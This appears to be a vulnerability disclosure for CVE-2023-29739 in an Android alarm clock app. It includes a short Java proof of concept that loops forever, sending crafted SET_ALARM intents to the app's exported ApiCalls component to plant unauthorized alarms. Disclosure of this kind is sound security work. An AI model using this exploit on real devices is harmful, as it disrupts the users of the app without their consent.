CVE-2023-29739: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

Escalation of Privileges exists in Alarm Clock for Heavy Sleepers（CVE-2023-29739）

Vendor：Smart Alarm Clock Team(http://amdroidapp.com/)

Affected product：Alarm Clock for Heavy Sleepers(com.amdroidalarmclock.amdroid)

Version：5.3.2

Download link： https://play.google.com/store/apps/details?id=com.amdroidalarmclock.amdroid

Description of the vulnerability for use in the CVE：An issue found in Alarm Clock for Heavy Sleepers v.5.3.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

poc：

private void attack() { while (true) { Intent intent = new Intent(); ComponentName componentName = new ComponentName("com.amdroidalarmclock.amdroid", “com.amdroidalarmclock.amdroid.ApiCalls”); intent.setComponent(componentName); intent.setAction(“android.intent.action.SET_ALARM”); intent.setClassName(“com.amdroidalarmclock.amdroid","com.amdroidalarmclock.amdroid.ApiCalls”); intent.putExtra("android.intent.extra.alarm.HOUR",11); intent.putExtra("android.intent.extra.alarm.MINUTES",30); intent.putExtra(“android.intent.extra.alarm.MESSAGE","this is hack’s message!”); ArrayList<Integer> list=new ArrayList<>(); list.add(0); list.add(1); list.add(0); list.add(1); list.add(0); list.add(1); list.add(0); intent.putIntegerArrayListExtra("android.intent.extra.alarm.DAYS", list); try { System.out.println(“发送数据”); sendBroadcast(intent); } catch (Exception e) { } } }